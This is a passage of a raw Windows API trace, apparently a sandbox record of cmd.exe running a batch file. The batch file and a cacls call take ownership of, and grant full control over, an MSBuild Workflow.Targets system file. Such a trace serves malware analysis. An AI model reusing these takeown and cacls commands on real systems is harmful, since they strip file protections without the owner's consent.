lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xffffffff [0266.108] GetLastError () returned 0x2 [0266.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xec0df8 [0266.108] FindClose (in: hFindFile=0xec0df8 | out: hFindFile=0xec0df8) returned 1 [0266.108] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0266.108] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0266.109] GetConsoleTitleW (in: lpConsoleTitle=0xcdf070, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.226] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0266.226] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0266.226] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0266.226] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0266.226] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0266.226] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0266.226] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0266.226] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0266.226] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0266.226] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0266.226] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0266.226] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0266.226] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0266.226] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0266.226] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0266.226] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0266.226] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0266.226] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0266.226] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0266.226] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0266.226] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0266.226] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0266.226] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0266.226] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0266.226] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0266.226] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0266.226] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0266.226] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0266.226] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0266.226] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0266.226] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0266.226] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0266.226] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0266.226] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0266.226] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0266.226] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0266.226] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0266.226] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0266.227] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0266.227] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0266.227] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0266.227] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0266.227] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0266.227] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0266.227] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0266.227] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0266.227] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0266.227] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0266.227] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0266.227] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0266.227] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0266.227] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0266.227] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0266.227] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0266.227] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0266.227] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0266.227] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0266.227] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0266.227] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0266.227] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0266.227] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0266.227] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0266.227] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0266.227] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0266.227] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0266.227] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0266.227] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0266.227] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0266.227] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0266.227] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0266.227] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0266.227] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0266.227] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0266.227] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0266.227] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0266.227] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0266.227] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0266.227] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0266.227] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0266.227] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0266.227] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0266.227] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0266.227] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0266.227] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0266.227] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0266.227] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0266.227] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0266.228] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0266.228] SetErrorMode (uMode=0x0) returned 0x0 [0266.228] SetErrorMode (uMode=0x1) returned 0x0 [0266.228] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xecc5e0, lpFilePart=0xcdeb7c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xcdeb7c*="Desktop") returned 0x1d [0266.228] SetErrorMode (uMode=0x0) returned 0x1 [0266.228] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0266.228] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0266.228] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.228] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.228] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xffffffff [0266.228] GetLastError () returned 0x2 [0266.228] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.229] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xffffffff [0266.229] GetLastError () returned 0x2 [0266.229] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.229] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xec0df8 [0266.229] FindClose (in: hFindFile=0xec0df8 | out: hFindFile=0xec0df8) returned 1 [0266.229] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xffffffff [0266.229] GetLastError () returned 0x2 [0266.229] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xcde908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde908) returned 0xec0df8 [0266.229] FindClose (in: hFindFile=0xec0df8 | out: hFindFile=0xec0df8) returned 1 [0266.229] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0266.229] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0266.229] GetConsoleTitleW (in: lpConsoleTitle=0xcdedfc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.616] InitializeProcThreadAttributeList (in: lpAttributeList=0xcded28, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xcded0c | out: lpAttributeList=0xcded28, lpSize=0xcded0c) returned 1 [0266.616] UpdateProcThreadAttribute (in: lpAttributeList=0xcded28, dwFlags=0x0, Attribute=0x60001, lpValue=0xcded14, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xcded28, lpPreviousValue=0x0) returned 1 [0266.616] GetStartupInfoW (in: lpStartupInfo=0xcded60 | out: lpStartupInfo=0xcded60*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0266.616] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0266.617] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0266.617] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0266.618] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xcdecb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xcdecfc | out: lpCommandLine="cacls \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0xcdecfc*(hProcess=0xb8, hThread=0xb0, dwProcessId=0x550, dwThreadId=0x2ec)) returned 1 [0266.627] CloseHandle (hObject=0xb0) returned 1 [0266.627] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0266.627] GetEnvironmentStringsW () returned 0xec9e50* [0266.627] FreeEnvironmentStringsA (penv="=") returned 1 [0266.627] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0267.732] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xcdec94 | out: lpExitCode=0xcdec94*=0x0) returned 1 [0267.732] CloseHandle (hObject=0xb8) returned 1 [0267.732] _vsnwprintf (in: _Buffer=0xcded7c, _BufferCount=0x13, _Format="%08X", _ArgList=0xcdec9c | out: _Buffer="00000000") returned 8 [0267.732] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0267.732] GetEnvironmentStringsW () returned 0xece3d8* [0267.733] FreeEnvironmentStringsA (penv="=") returned 1 [0267.733] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0267.733] GetEnvironmentStringsW () returned 0xece3d8* [0267.733] FreeEnvironmentStringsA (penv="=") returned 1 [0267.733] DeleteProcThreadAttributeList (in: lpAttributeList=0xcded28 | out: lpAttributeList=0xcded28) [0267.733] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.733] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0269.025] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.025] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0269.025] _get_osfhandle (_FileHandle=0) returned 0x38 [0269.025] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0269.026] SetConsoleInputExeNameW () returned 0x1 [0269.026] GetConsoleOutputCP () returned 0x1b5 [0269.026] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0269.026] SetThreadUILanguage (LangId=0x0) returned 0x409 [0269.026] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xcdf4bc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0269.026] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0269.026] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.026] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0269.027] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.027] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0269.027] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xcdf48c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xcdf48c*=0xc2, lpOverlapped=0x0) returned 1 [0269.027] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0269.028] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0269.028] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.028] GetFileType (hFile=0xb8) returned 0x1 [0269.028] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.028] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0269.028] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0269.028] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0269.028] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0269.028] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0269.028] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0269.028] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0269.028] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0269.028] _tell (_FileHandle=3) returned 47 [0269.028] _close (_FileHandle=3) returned 0 [0269.029] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf250 | out: _Buffer="\r\n") returned 2 [0269.029] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.029] GetFileType (hFile=0x3c) returned 0x2 [0269.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.029] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf228 | out: lpMode=0xcdf228) returned 1 [0269.029] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.029] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf240, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf240*=0x2) returned 1 [0269.029] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0269.029] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0269.029] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xcdf24c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0269.029] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xcdf24c | out: _Buffer=">") returned 1 [0269.029] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.029] GetFileType (hFile=0x3c) returned 0x2 [0269.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.029] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf22c | out: lpMode=0xcdf22c) returned 1 [0269.030] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.030] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcdf244, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xcdf244*=0x1e) returned 1 [0269.030] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.030] GetFileType (hFile=0x3c) returned 0x2 [0269.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.030] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4cc | out: lpMode=0xcdf4cc) returned 1 [0269.030] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.030] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xec77f0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xcdf4e4, lpReserved=0x0 | out: lpBuffer=0xec77f0*, lpNumberOfCharsWritten=0xcdf4e4*=0x7) returned 1 [0269.030] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xcdf4ec | out: _Buffer=" /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\" ") returned 91 [0269.030] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.030] GetFileType (hFile=0x3c) returned 0x2 [0269.031] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.031] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c4 | out: lpMode=0xcdf4c4) returned 1 [0269.031] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.031] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x5b, lpNumberOfCharsWritten=0xcdf4dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4dc*=0x5b) returned 1 [0269.031] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf500 | out: _Buffer="\r\n") returned 2 [0269.031] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.031] GetFileType (hFile=0x3c) returned 0x2 [0269.031] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.031] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4d8 | out: lpMode=0xcdf4d8) returned 1 [0269.031] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.031] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf4f0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4f0*=0x2) returned 1 [0269.032] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0269.032] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0269.032] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0269.032] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0269.032] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0269.032] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0269.032] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0269.032] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0269.032] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0269.032] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0269.032] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0269.032] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0269.032] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0269.032] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0269.032] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0269.032] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0269.032] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0269.032] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0269.032] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0269.032] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0269.032] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0269.032] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0269.032] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0269.032] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0269.032] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0269.032] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0269.032] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0269.032] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0269.032] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0269.032] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0269.032] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0269.032] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0269.032] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0269.032] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0269.032] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0269.032] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0269.032] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0269.032] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0269.032] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0269.032] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0269.032] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0269.032] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0269.033] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0269.033] SetErrorMode (uMode=0x0) returned 0x0 [0269.033] SetErrorMode (uMode=0x1) returned 0x0 [0269.033] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xecf9c0, lpFilePart=0xcdf29c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", 